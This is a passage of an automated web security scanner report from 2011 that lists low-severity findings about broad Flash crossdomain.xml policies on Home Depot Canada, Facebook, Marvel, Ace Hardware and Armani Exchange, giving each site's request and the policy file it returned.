<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.70. https://secure.homedepot.ca/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.homedepot.ca
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:35 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 22:48:47 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.homedepot.ca" /> <allow-access-from domain="*.startaconversation.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.71. http://static.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 10:34:08 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.72. http://subscriptions.marvel.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://subscriptions.marvel.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.73. https://subscriptions.marvel.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:24 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.74. http://www.acehardware.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.75. https://www.acehardware.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.76. http://www.armaniexchange.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.armaniexchange.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:05:22 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.77. https://www.armaniexchange.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:23:16 GMT
Date: Mon, 16 May 2011 02:13:16 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.78. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.208.77
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
